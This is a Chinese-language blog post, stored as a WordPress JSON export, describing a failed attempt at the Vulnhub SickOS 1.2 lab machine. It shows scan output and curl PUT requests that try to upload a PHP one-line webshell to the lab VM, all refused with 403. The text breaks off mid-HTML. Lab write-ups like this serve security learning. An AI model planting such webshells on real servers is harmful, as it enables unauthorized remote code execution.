{"id":358,"date":"2024-02-07T13:22:03","date_gmt":"2024-02-07T05:22:03","guid":{"rendered":"http:\/\/162.14.82.114\/?p=358"},"modified":"2024-02-07T13:22:03","modified_gmt":"2024-02-07T05:22:03","slug":"vulnhub-sickos1-2%e5%a4%b1%e8%b4%a5","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/358\/02\/07\/2024\/","title":{"rendered":"Vulnhub&#8211;SICKOS:1.2(\u5931\u8d25)"},"content":{"rendered":"<h1>SICKOS: 1.2\uff08\u5931\u8d25\uff09<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320647.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320647.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205113022726\" \/><\/div><\/p>\n<h2>\u9009\u62e9\u6253\u5f00\u73af\u5883\uff08VMware\uff09<\/h2>\n<p>\u53ef\u4ee5\u4f7f\u7528<code>VMware<\/code>\u6253\u5f00\uff0c<code>VirtualBox<\/code>\u6253\u5f00\u4f1a\u51fa\u73b0\u95ee\u9898\uff0c\u6309\u7167\u4fee\u6539\uff0c\u5c06<code>.ovf<\/code>\u6587\u4ef6\u4e2d\u6240\u6709\u7684<code>ElementName<\/code>\u6539\u4e3a<code>Caption<\/code>\uff0c\u6240\u6709\u7684<code>vmware.sata.ahci<\/code>\u6539\u4e3a<code>AHCI<\/code>\uff0c\u5220\u9664<code>.mf<\/code>\u6587\u4ef6\uff0c\u91cd\u65b0\u5bfc\u5165\uff01<\/p>\n<p>\u6211\u4eec\u660e\u77e5\u5c71\u6709\u864e\u504f\u5411\u864e\u5c71\u884c\uff0c\u4f7f\u7528<code>VirtualBox<\/code>\u6253\u5f00\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320649.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320649.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205114013097\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u770b\u8d77\u6765\u5341\u5206\u7684\u6b63\u5e38\uff0c\u5b9e\u9645\u6211\u4eec\u626b\u4e00\u4e0b\u4f1a\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320651.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320651.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205114457184\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u626b\u4e0d\u51fa\u6765\uff0c\u5207\u6362\u81f3<code>NAT<\/code>\u8fde\u63a5\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320652.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320652.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205114717392\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320653.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320653.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205114922061\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u626b\u4e0d\u5230\uff0c\u4e0d\u6d6a\u8d39\u65f6\u95f4\u5728\u8fd9\u65b9\u9762\u4e86\uff0c\u4f7f\u7528<code>vmdk<\/code>\u6587\u4ef6\u5427\uff1a\uff08\u8001\u6837\u5b50\u521b\u5efa\u65b0\u865a\u62df\u673a\uff0c\u5bfc\u5165\u539f\u6709\u786c\u76d8\u5373\u53ef\uff09<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320654.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320654.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205115432424\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u626b\u51fa\u6765\u4e86\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320655.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320655.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205115540584\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e00\u5207\u6b63\u5e38\uff0c\u4e0b\u9762\u53ef\u4ee5\u5f00\u59cb\u8fdb\u884c\u516c\u9e21\u8fa3\uff01<\/p>\n<blockquote>\n<p>&quot;Antivirus software company&quot; \u6307\u7684\u662f\u63d0\u4f9b\u9632\u75c5\u6bd2\u8f6f\u4ef6\u7684\u516c\u53f8\uff0c\u8fd9\u4e9b\u516c\u53f8\u4e13\u6ce8\u4e8e\u5f00\u53d1\u548c\u63d0\u4f9b\u7528\u4e8e\u68c0\u6d4b\u3001\u9632\u6b62\u548c\u6e05\u9664\u8ba1\u7b97\u673a\u75c5\u6bd2\u7684\u8f6f\u4ef6\u3002\u8fd9\u7c7b\u8f6f\u4ef6\u901a\u5e38\u88ab\u8bbe\u8ba1\u7528\u4e8e\u4fdd\u62a4\u8ba1\u7b97\u673a\u7cfb\u7edf\u3001\u7f51\u7edc\u548c\u6570\u636e\u514d\u53d7\u6076\u610f\u8f6f\u4ef6\u3001\u75c5\u6bd2\u548c\u5176\u4ed6\u5b89\u5168\u5a01\u80c1\u7684\u4fb5\u5bb3\u3002<\/p>\n<\/blockquote>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\">rustscan -a 192.168.244.183\n# PORT   STATE SERVICE REASON\n# 22\/tcp open  ssh     syn-ack ttl 64\n# 80\/tcp open  http    syn-ack ttl 64<\/code><\/pre>\n<pre><code class=\"language-shell\">nmap -sV -p- -A  192.168.244.183 \n# PORT   STATE SERVICE VERSION\n# 22\/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)\n# | ssh-hostkey: \n# |   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)\n# |   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)\n# |_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)\n# 80\/tcp open  http    lighttpd 1.4.28\n# |_http-server-header: lighttpd\/1.4.28\n# |_http-title: Site doesn&#039;t have a title (text\/html).\n# Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u4fe1\u606f\u67e5\u8be2<\/h3>\n<p>\u626b\u63cf\u592a\u6162\u5566\uff0c\u6253\u5f00\u6e90\u4ee3\u7801\u770b\u770b\uff0c\u5565\u90fd\u6ca1\u6709\u3002<\/p>\n<p><code>Wapplalyzer<\/code>\u63d2\u4ef6\u67e5\u770b\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320656.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320656.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205120139742\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\">feroxbuster -u http:\/\/192.168.244.183\n# 301      GET        0l        0w        0c http:\/\/192.168.244.183\/test =&gt; http:\/\/192.168.244.183\/test\/\n# 200      GET      123l      992w    84849c http:\/\/192.168.244.183\/blow.jpg\n# 200      GET       96l       10w      163c http:\/\/192.168.244.183\/\n# 403      GET       11l       26w      345c http:\/\/192.168.244.183\/~\n# 403      GET       11l       26w      345c http:\/\/192.168.244.183\/~sys~<\/code><\/pre>\n<pre><code class=\"language-shell\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.244.183 -f -t 200\n# \/test\/                (Status: 200) [Size: 1360]<\/code><\/pre>\n<p>\u90fd\u663e\u793a<code>test<\/code>\u5b58\u5728\uff0c\u5c1d\u8bd5\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320657.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320657.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205121041933\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6709\u4e00\u4e2a\u76ee\u5f55\uff0c\u770b\u4e00\u4e0b\u7ed3\u6784\uff0c\u70b9\u4e00\u4e0b<code>Parent Directory<\/code>\uff0c\u53c8\u5f39\u56de\u53bb\u4e86\u3002\u3002\u3002<\/p>\n<h3>\u7f51\u7ad9\u6307\u7eb9\u8bc6\u522b<\/h3>\n<pre><code class=\"language-shell\">whatweb 192.168.244.183\n# http:\/\/192.168.244.183 [200 OK] Country[RESERVED][ZZ], HTTPServer[lighttpd\/1.4.28], IP[192.168.244.183], PHP[5.3.10-1ubuntu3.21], X-Powered-By[PHP\/5.3.10-1ubuntu3.21], lighttpd[1.4.28]<\/code><\/pre>\n<h3>enum4linux<\/h3>\n<pre><code class=\"language-shell\">enum4linux 192.168.244.183<\/code><\/pre>\n<p>\u53ea\u67e5\u5230\u4e86\u4e00\u4e9b\u7528\u6237\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320658.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320658.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205215358703\" style=\"zoom: 67%;\" \/><\/div><\/p>\n<h3>nikto\u626b\u63cf<\/h3>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          192.168.244.183\n+ Target Hostname:    192.168.244.183\n+ Target Port:        80\n+ Start Time:         2024-02-06 22:56:56 (GMT-5)\n---------------------------------------------------------------------------\n+ Server: lighttpd\/1.4.28\n+ \/: Retrieved x-powered-by header: PHP\/5.3.10-1ubuntu3.21.\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .\n+ \/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184\n+ \/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184\n+ \/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184\n+ \/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184\n+ \/test\/: Directory indexing found.\n+ \/test\/: This might be interesting.\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host\n+ End Time:           2024-02-06 22:57:07 (GMT-5) (11 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested\n<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u5c1d\u8bd5lighttpd\u670d\u52a1\u6f0f\u6d1e\uff08\u5931\u8d25\uff09<\/h3>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a<code>lighttpd 1.4.28<\/code>\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320659.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320659.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205121344632\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u6ca1\u6709\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u6765\u83b7\u53d6flag\u7684\u6f0f\u6d1e\u3002\u3002\u3002<\/p>\n<h3>put\u4e0a\u4f20\u6f0f\u6d1e<\/h3>\n<p>\u4f7f\u7528\u547d\u4ee4\u67e5\u770b\u4e00\u4e0b\u53c2\u6570\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">curl -v -X OPTIONS http:\/\/192.168.244.183\/test\/\n# -v: \u57fa\u672c\u7684\u8be6\u7ec6\u6a21\u5f0f\uff0c\u663e\u793a\u8bf7\u6c42\u7684\u76f8\u5173\u4fe1\u606f\uff0c\u5982\u8bf7\u6c42\u5934\u548c\u54cd\u5e94\u5934\u3002\n# -vv: \u66f4\u8be6\u7ec6\u7684\u6a21\u5f0f\uff0c\u663e\u793a\u8be6\u7ec6\u7684\u8bf7\u6c42\u548c\u54cd\u5e94\u4fe1\u606f\uff0c\u5305\u62ec\u6bcf\u4e00\u6b65\u7684\u7ec6\u8282\u3002\n# -vvv: \u6700\u8be6\u7ec6\u7684\u6a21\u5f0f\uff0c\u663e\u793a\u6bcf\u4e00\u4e2a\u6570\u636e\u5305\u7684\u8be6\u7ec6\u4fe1\u606f\uff0c\u5305\u62ec TCP \u8fde\u63a5\u7684\u5efa\u7acb\u3001SSL\/TLS \u63e1\u624b\u7b49\u3002\n# -X OPTIONS: \u4f7f\u7528 OPTIONS \u65b9\u6cd5\u3002OPTIONS \u65b9\u6cd5\u901a\u5e38\u7528\u4e8e\u8bf7\u6c42\u76ee\u6807\u8d44\u6e90\u7684\u901a\u4fe1\u9009\u9879\uff0c\u6216\u8005\u67e5\u8be2\u670d\u52a1\u5668\u652f\u6301\u7684\u65b9\u6cd5\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u8868\u793a\u53d1\u9001\u4e00\u4e2a OPTIONS \u8bf7\u6c42\u3002\n# http:\/\/192.168.244.183\/test\/: \u8bf7\u6c42\u7684\u76ee\u6807 URL\uff0c\u5176\u4e2d http:\/\/ \u662f\u534f\u8bae\uff0c192.168.244.183 \u662f\u4e3b\u673a\u5730\u5740\uff0c\/test\/ \u662f\u8bf7\u6c42\u7684\u8def\u5f84\u3002<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320660.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320660.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205220429070\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5141\u8bb8\u591a\u9879\u4f20\u8f93\u53c2\u6570\uff0c\u8fd9\u91cc\u53d1\u73b0\u4e86<code>put<\/code>\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u81ea\u5df1\u7684\u6076\u610f\u6587\u4ef6\uff01\u53ef\u4ee5\u53c2\u8003\uff1a<a href=\"https:\/\/zhuanlan.zhihu.com\/p\/41454441\">https:\/\/zhuanlan.zhihu.com\/p\/41454441<\/a><\/p>\n<p>\u7136\u540e\u8fdb\u884c\u4e0a\u4f20 shell \u811a\u672c\uff1a<\/p>\n<h4>\u4e00\u53e5\u8bdd\u6728\u9a6c+\u8681\u5251<\/h4>\n<p>\u4e0a\u4f20\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-shell\">curl -v -X PUT -d &#039;&lt;?php @eval($_GET[&quot;hack&quot;]);?&gt;&#039; http:\/\/192.168.244.183\/test\/webshell.php<\/code><\/pre>\n<p>\u4f46\u662f\u6211\u8fd9\u91cc\u603b\u662f\u51fa\u73b0\u62a5\u9519\uff0c\u4e0d\u77e5\u9053\u4e3a\u5565\uff1a<\/p>\n<pre><code class=\"language-text\">*   Trying 192.168.244.183:80...\n* Connected to 192.168.244.183 (192.168.244.183) port 80\n> PUT \/test\/webshell.php HTTP\/1.1\n> Host: 192.168.244.183\n> User-Agent: curl\/8.5.0\n> Accept: *\/*\n> Content-Length: 29\n> Content-Type: application\/x-www-form-urlencoded\n> \n&lt; HTTP\/1.1 403 Forbidden\n&lt; Content-Type: text\/html\n&lt; Content-Length: 345\n&lt; Date: Tue, 06 Feb 2024 15:27:37 GMT\n&lt; Server: lighttpd\/1.4.28\n&lt; \n&lt;?xml version=&quot;1.0&quot; encoding=&quot;iso-8859-1&quot;?&gt;\n&lt;!DOCTYPE html PUBLIC &quot;-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN&quot;\n         &quot;http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd&quot;&gt;\n&lt;html xmlns=&quot;http:\/\/www.w3.org\/1999\/xhtml&quot; xml:lang=&quot;en&quot; lang=&quot;en&quot;&gt;\n &lt;head&gt;\n  &lt;title&gt;403 - Forbidden&lt;\/title&gt;\n &lt;\/head&gt;\n &lt;body&gt;\n  &lt;h1&gt;403 - Forbidden&lt;\/h1&gt;\n &lt;\/body&gt;\n&lt;\/html&gt;\n* Connection #0 to host 192.168.244.183 left intact<\/code><\/pre>\n<p>\u8fd9\u91cc\u89c9\u5f97\u53ef\u80fd\u662f\u56e0\u4e3a<code>curl<\/code>\u9ed8\u8ba4<code>HTTP1.1<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">curl -v -X PUT -d &#039;&lt;?php @eval($_GET[&quot;hack&quot;]);?&gt;&#039; http:\/\/192.168.244.183\/test\/webshell.php -0<\/code><\/pre>\n<p>\u8fd8\u662f\u4e0d\u884c\uff1a<\/p>\n<pre><code class=\"language-shell\">*   Trying 192.168.244.183:80...\n* Connected to 192.168.244.183 (192.168.244.183) port 80\n> PUT \/test\/webshell.php HTTP\/1.0\n> Host: 192.168.244.183\n> User-Agent: curl\/8.5.0\n> Accept: *\/*\n> Content-Length: 29\n> Content-Type: application\/x-www-form-urlencoded\n> \n* HTTP 1.0, assume close after body\n&lt; HTTP\/1.0 403 Forbidden\n&lt; Content-Type: text\/html\n&lt; Content-Length: 345\n&lt; Connection: close\n&lt; Date: Tue, 06 Feb 2024 16:52:35 GMT\n&lt; Server: lighttpd\/1.4.28\n&lt; \n&lt;?xml version=&quot;1.0&quot; encoding=&quot;iso-8859-1&quot;?&gt;\n&lt;!DOCTYPE html PUBLIC &quot;-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN&quot;\n         &quot;http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd&quot;&gt;\n&lt;html xmlns=&quot;http:\/\/www.w3.org\/1999\/xhtml&quot; xml:lang=&quot;en&quot; lang=&quot;en&quot;&gt;\n &lt;head&gt;\n  &lt;title&gt;403 - Forbidden&lt;\/title&gt;\n &lt;\/head&gt;\n &lt;body&gt;\n  &lt;h1&gt;403 - Forbidden&lt;\/h1&gt;\n &lt;\/body&gt;\n&lt;\/html&gt;\n* Closing connection<\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u76f4\u63a5\u6293\u5305\u8fdb\u884c\u5c1d\u8bd5\u628a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320661.png'><img class=\"lazyload lazyload-style-2\" 